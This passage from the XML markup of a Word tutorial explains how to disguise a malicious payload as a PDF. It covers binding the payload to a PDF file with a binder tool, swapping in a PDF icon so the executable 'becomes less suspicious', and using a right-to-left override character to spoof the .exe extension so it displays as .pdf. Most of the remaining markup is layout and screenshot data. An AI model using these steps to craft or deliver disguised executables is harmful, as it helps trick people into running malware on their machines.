    <w:p w14:paraId="3F880FB4" w14:textId="77777777" w:rsidR="00D13AAE" w:rsidRPr="00A63E63" w:rsidRDefault="00D13AAE" w:rsidP="00D13AAE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A63E63">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
        </w:rPr>
        <w:t>Now in order to integrate the pdf file and the payload we will be using a tool called celesty file binder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B94CB14" w14:textId="0C3F1457" w:rsidR="00D13AAE" w:rsidRDefault="00D13AAE" w:rsidP="00D13AAE">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AFC171C" w14:textId="640F6E47" w:rsidR="00F76D68" w:rsidRDefault="00F76D68" w:rsidP="00D13AAE">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F068338" w14:textId="77E4C49F" w:rsidR="00F76D68" w:rsidRDefault="00F76D68" w:rsidP="00D13AAE">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E57FA54" w14:textId="302B3804" w:rsidR="00F76D68" w:rsidRDefault="00F76D68" w:rsidP="00D13AAE">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0510C095" w14:textId="6EB8C069" w:rsidR="00F76D68" w:rsidRDefault="00F76D68" w:rsidP="00D13AAE">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40BA6365" w14:textId="4983FF38" w:rsidR="00F76D68" w:rsidRDefault="00F76D68" w:rsidP="00D13AAE">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67E2E5E7" w14:textId="069AB19A" w:rsidR="00F76D68" w:rsidRDefault="00F76D68" w:rsidP="00D13AAE">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="779C1CE3" w14:textId="77777777" w:rsidR="00F76D68" w:rsidRPr="00A63E63" w:rsidRDefault="00F76D68" w:rsidP="00D13AAE">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EF9C827" w14:textId="474023A6" w:rsidR="008B770D" w:rsidRPr="00A63E63" w:rsidRDefault="008B770D" w:rsidP="007C5290">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02A46802" w14:textId="5A250F73" w:rsidR="00D13AAE" w:rsidRPr="00A63E63" w:rsidRDefault="00D13AAE" w:rsidP="007C5290">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A63E63">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66863D44" wp14:editId="46E93797">
            <wp:extent cx="5105400" cy="1935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105400" cy="1935480"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="437DE2FD" w14:textId="77777777" w:rsidR="00D13AAE" w:rsidRPr="00A63E63" w:rsidRDefault="00D13AAE" w:rsidP="00D13AAE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A63E63">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
        </w:rPr>
        <w:t>Lets integrate the files using the celesty file binder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACE9D85" w14:textId="6D733056" w:rsidR="00D13AAE" w:rsidRPr="00A63E63" w:rsidRDefault="00D13AAE" w:rsidP="007C5290">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A63E63">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7DF7AD3B" wp14:editId="21BDAEEA">
            <wp:extent cx="3734124" cy="24919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34124" cy="2491956"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="77124D5F" w14:textId="2302DC0A" w:rsidR="00D13AAE" w:rsidRPr="00A63E63" w:rsidRDefault="00D13AAE" w:rsidP="007C5290">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A63E63">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
        </w:rPr>
        <w:t>We have drag and drop the files we want to integrate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D281F53" w14:textId="77777777" w:rsidR="00D13AAE" w:rsidRPr="00A63E63" w:rsidRDefault="00D13AAE" w:rsidP="00D13AAE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A63E63">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
        </w:rPr>
        <w:t xml:space="preserve">We have to load an icon.So basically it will change the icon of </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27467A7C" w14:textId="3B0D164B" w:rsidR="00D13AAE" w:rsidRDefault="00D13AAE" w:rsidP="00D13AAE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A63E63">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
        </w:rPr>
        <w:t>the executable as a pdf one,so that the file become less suspicious.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001D0F65" w14:textId="77777777" w:rsidR="00F76D68" w:rsidRPr="00A63E63" w:rsidRDefault="00F76D68" w:rsidP="00D13AAE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FF16DC0" w14:textId="77777777" w:rsidR="00D13AAE" w:rsidRPr="00A63E63" w:rsidRDefault="00D13AAE" w:rsidP="00D13AAE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A0C5FBC" w14:textId="78694A75" w:rsidR="00D13AAE" w:rsidRPr="00A63E63" w:rsidRDefault="00D13AAE" w:rsidP="00D13AAE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A5A6023" w14:textId="782725CF" w:rsidR="00D13AAE" w:rsidRPr="00A63E63" w:rsidRDefault="00D13AAE" w:rsidP="00D13AAE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10E26339" w14:textId="58054045" w:rsidR="00D13AAE" w:rsidRPr="00A63E63" w:rsidRDefault="00D13AAE" w:rsidP="00D13AAE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C7F8A9B" w14:textId="23F53999" w:rsidR="00D13AAE" w:rsidRPr="00A63E63" w:rsidRDefault="00D13AAE" w:rsidP="00D13AAE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D4D63AC" w14:textId="3CF580B2" w:rsidR="00D13AAE" w:rsidRPr="00A63E63" w:rsidRDefault="00D13AAE" w:rsidP="00D13AAE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="315703E2" w14:textId="7A0EFAFC" w:rsidR="00D13AAE" w:rsidRPr="00A63E63" w:rsidRDefault="00D13AAE" w:rsidP="00D13AAE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A63E63">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00A63E63">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00A63E63">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00A63E63">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00A63E63">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00A63E63">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00A63E63">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00A63E63">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00A63E63">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D5BDE3" w14:textId="2BBF86B1" w:rsidR="00D13AAE" w:rsidRPr="00A63E63" w:rsidRDefault="00D13AAE" w:rsidP="00D13AAE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A63E63">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03E29B50" wp14:editId="276D0A7B">
            <wp:extent cx="3081941" cy="2026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085213" cy="2029072"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9EF290" w14:textId="77777777" w:rsidR="00D13AAE" w:rsidRPr="00A63E63" w:rsidRDefault="00D13AAE" w:rsidP="00D13AAE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E946AFD" w14:textId="5C370D6C" w:rsidR="00D13AAE" w:rsidRPr="00A63E63" w:rsidRDefault="00D13AAE" w:rsidP="00D13AAE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A63E63">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
        </w:rPr>
        <w:t>We will click on the “</w:t>
      </w:r>
      <w:r w:rsidRPr="00A63E63">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Build final stub inorder to build our integrated file”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470ACFEF" w14:textId="5753176D" w:rsidR="00D13AAE" w:rsidRPr="00A63E63" w:rsidRDefault="00D13AAE" w:rsidP="00D13AAE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A63E63">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A9E7A90" wp14:editId="5CD0D37B">
            <wp:extent cx="3635055" cy="232430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35055" cy="2324301"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B69215" w14:textId="5C0EEF2B" w:rsidR="00D13AAE" w:rsidRPr="00A63E63" w:rsidRDefault="00D13AAE" w:rsidP="00D13AAE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D9D6478" w14:textId="0B544EDE" w:rsidR="00D13AAE" w:rsidRPr="00A63E63" w:rsidRDefault="00D13AAE" w:rsidP="00D13AAE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A63E63">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Now we have successfully changed the icon of the payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C62540B" w14:textId="18FD2242" w:rsidR="007E0B97" w:rsidRPr="00A63E63" w:rsidRDefault="007E0B97" w:rsidP="007E0B97">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4217FEA4" w14:textId="75E4487D" w:rsidR="007E0B97" w:rsidRDefault="007E0B97" w:rsidP="007E0B97">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51BDE975" w14:textId="7DB21414" w:rsidR="00F76D68" w:rsidRDefault="00F76D68" w:rsidP="007E0B97">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33B936A8" w14:textId="63729A61" w:rsidR="00F76D68" w:rsidRDefault="00F76D68" w:rsidP="007E0B97">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E9962CA" w14:textId="1D6FBA46" w:rsidR="00F76D68" w:rsidRDefault="00F76D68" w:rsidP="007E0B97">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6249CF91" w14:textId="44ACDA19" w:rsidR="00F76D68" w:rsidRDefault="00F76D68" w:rsidP="007E0B97">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3637C48E" w14:textId="147C3C67" w:rsidR="00F76D68" w:rsidRDefault="00F76D68" w:rsidP="007E0B97">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D25F376" w14:textId="77777777" w:rsidR="00F76D68" w:rsidRPr="00A63E63" w:rsidRDefault="00F76D68" w:rsidP="007E0B97">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21D891B6" w14:textId="0C5AB68E" w:rsidR="007E0B97" w:rsidRPr="00A63E63" w:rsidRDefault="007E0B97" w:rsidP="007E0B97">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F1A2B59" w14:textId="79FDACED" w:rsidR="007E0B97" w:rsidRPr="00A63E63" w:rsidRDefault="007E0B97" w:rsidP="007E0B97">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13DFF7C3" w14:textId="1230AA77" w:rsidR="007E0B97" w:rsidRPr="00A63E63" w:rsidRDefault="007E0B97" w:rsidP="007E0B97">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70085AAA" w14:textId="77777777" w:rsidR="007E0B97" w:rsidRPr="00A63E63" w:rsidRDefault="007E0B97" w:rsidP="007E0B97">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43FA1FA9" w14:textId="4E64B432" w:rsidR="00D13AAE" w:rsidRDefault="007E0B97" w:rsidP="00D13AAE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Brush Script MT" w:hAnsi="Brush Script MT"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="793E5697" wp14:editId="437C1C3E">
            <wp:extent cx="3886200" cy="2633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892664" cy="2638361"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F95008B" w14:textId="77777777" w:rsidR="007E0B97" w:rsidRDefault="007E0B97" w:rsidP="007E0B97">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="135E2E2D" w14:textId="72A0D840" w:rsidR="007E0B97" w:rsidRPr="00A63E63" w:rsidRDefault="007E0B97" w:rsidP="007E0B97">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A63E63">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SPOOFING EXE EXTENSION TO PDF EXTENSION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6F8DBF" w14:textId="4E58916E" w:rsidR="007E0B97" w:rsidRPr="00A63E63" w:rsidRDefault="007E0B97" w:rsidP="007E0B97">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A63E63">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Though we have changed the icon,the file is still showing an extension of exe.It can be changed using “</w:t>
      </w:r>
      <w:r w:rsidRPr="00A63E63">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Characters</w:t>
      </w:r>
      <w:r w:rsidRPr="00A63E63">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>” tool in kali.So we will use the right to left override in order to change the display of the extension</w:t>
      </w:r>
      <w:r w:rsidRPr="00A63E63">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A63E63">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>It should be noted that the extension will remain as executable only.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66733639" w14:textId="710716EE" w:rsidR="007E0B97" w:rsidRDefault="007E0B97" w:rsidP="007E0B97">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Brush Script MT" w:hAnsi="Brush Script MT"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3807A691" wp14:editId="42CD5E89">
            <wp:extent cx="2849880" cy="173505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8066" cy="1752212"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C96128A" w14:textId="545230D7" w:rsidR="007E0B97" w:rsidRDefault="007E0B97" w:rsidP="007E0B97">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="702899EB" w14:textId="60A5C933" w:rsidR="007E0B97" w:rsidRDefault="007E0B97" w:rsidP="007E0B97">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
